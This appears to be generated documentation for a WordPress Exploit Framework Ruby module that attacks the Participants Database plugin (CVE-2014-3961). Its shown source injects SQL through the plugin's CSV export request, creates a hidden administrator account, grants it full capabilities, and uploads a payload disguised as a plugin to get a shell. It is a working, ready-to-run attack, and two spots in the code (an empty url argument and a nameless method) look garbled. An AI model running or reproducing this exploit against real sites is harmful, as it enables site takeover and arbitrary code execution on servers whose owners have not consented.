Class: Wpxf::Exploit::ParticipantsDatabaseV1548ShellUpload

Inherits:
Module
  • Object
show all
Includes:
Wpxf, WordPress::Plugin
Defined in:
lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeParticipantsDatabaseV1548ShellUpload

Returns a new instance of ParticipantsDatabaseV1548ShellUpload.



7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 7

def initialize
  super

  update_info(
    name: 'Participants Database <= 1.5.4.8 Shell Upload',
    desc: %(
      In versions <= 1.5.4.8 of the Participants Database, anonymous users
      are able to execute arbitrary SQL statements. This module utilises
      this vulnerability to create a new admin user and upload a payload
      masked as a plugin.
    ),
    author: [
      'Yarubo Research Team', # Vulnerability discovery
      'rastating'             # WPXF module
    ],
    references: [
      ['CVE', '2014-3961'],
      ['WPVDB', '7247'],
      ['EDB', '33613']
    ],
    date: 'Aug 01 2014'
  )

  register_options([
    StringOption.new(
      name: 'sign_up_path',
      desc: 'The relative path of the Participants Database sign up page',
      required: true
    ),
    StringOption.new(
      name: 'wp_prefix',
      desc: 'The database table prefix. Default: wp_',
      required: true,
      default: 'wp_'
    ),
    IntegerOption.new(
      name: 'user_id',
      desc: 'The ID number to use for the new admin account',
      required: true,
      default: (60_000..90_000).to_a.sample
    ),
    StringOption.new(
      name: 'username',
      desc: 'The username to use for the new admin account',
      required: true,
      default: Utility::Text.rand_alpha(6)
    ),
    StringOption.new(
      name: 'password',
      desc: 'The password to use for the new admin account',
      required: true,
      default: Utility::Text.rand_alpha(6)
    ),
    StringOption.new(
      name: 'email',
      desc: 'The e-mail address to use for the new admin account',
      required: true,
      default: Utility::Text.rand_email
    )
  ])
end

Instance Method Details

#checkObject



69
70
71
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 69

def check
  check_plugin_version_from_readme('participants-database', '1.5.4.9')
end

#execute_payloadObject



134
135
136
137
138
139
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 134

def execute_payload
  emit_info 'Uploading the payload...'
  cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
  res = upload_payload_as_plugin_and_execute(Utility::Text.rand_alpha(6), Utility::Text.rand_alpha(6), cookie)
  res&.code != 404
end

#execute_sql_query(query) ⇒ Object



118
119
120
121
122
123
124
125
126
127
128
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 118

def execute_sql_query(query)
  builder = Utility::BodyBuilder.new
  builder.add_field('action', 'output CSV')
  builder.add_field('subsource', 'participants-database')
  builder.add_field('CSV_type', 'participant list')
  builder.add_field('query', query)

  builder.create do |body|
    execute_post_request(url: , body: body)
  end
end

#hexified_emailObject



93
94
95
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 93

def hexified_email
  "0x#{Utility::Text.hexify_string(datastore['email'])}"
end

#hexified_password_hashObject



89
90
91
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 89

def hexified_password_hash
  "0x#{Utility::Text.hexify_string(password_hash)}"
end

#hexified_usernameObject



81
82
83
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 81

def hexified_username
  "0x#{Utility::Text.hexify_string(datastore['username'])}"
end

#new_user_sqlObject



101
102
103
104
105
106
107
108
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 101

def new_user_sql
  [
    "insert into #{table_name('users')}",
    '(ID, user_login, user_pass, user_nicename, user_email, user_status, display_name)',
    'values',
    "(#{user_id}, #{hexified_username}, #{hexified_password_hash}, #{hexified_username}, #{hexified_email}, 0, #{hexified_username});"
  ].join(' ')
end

#password_hashObject



85
86
87
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 85

def password_hash
  Utility::Text.md5(datastore['password'])
end

#runObject



141
142
143
144
145
146
147
148
149
150
151
152
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 141

def run
  return false unless super

  emit_info 'Creating a new user...'
  execute_sql_query(new_user_sql)

  emit_info 'Elevating user privileges...'
  update_user_meta('wp_user_level', '10')
  update_user_meta('wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')

  execute_payload
end

#sign_up_urlObject



73
74
75
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 73

def 
  normalize_uri(full_uri, datastore['sign_up_path'])
end

#table_name(name) ⇒ Object



97
98
99
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 97

def table_name(name)
  "#{datastore['wp_prefix']}#{name}"
end

#update_user_meta(key, value) ⇒ Object



130
131
132
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 130

def update_user_meta(key, value)
  execute_sql_query(user_meta_sql(key, value))
end

#user_idObject



77
78
79
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 77

def user_id
  normalized_option_value('user_id')
end

#user_meta_sql(key, value) ⇒ Object



110
111
112
113
114
115
116
# File 'lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb', line 110

def user_meta_sql(key, value)
  [
    "insert into #{table_name('usermeta')}",
    '(user_id, meta_key, meta_value) values',
    "(#{user_id}, 0x#{Utility::Text.hexify_string(key)}, 0x#{Utility::Text.hexify_string(value)})"
  ].join(' ')
end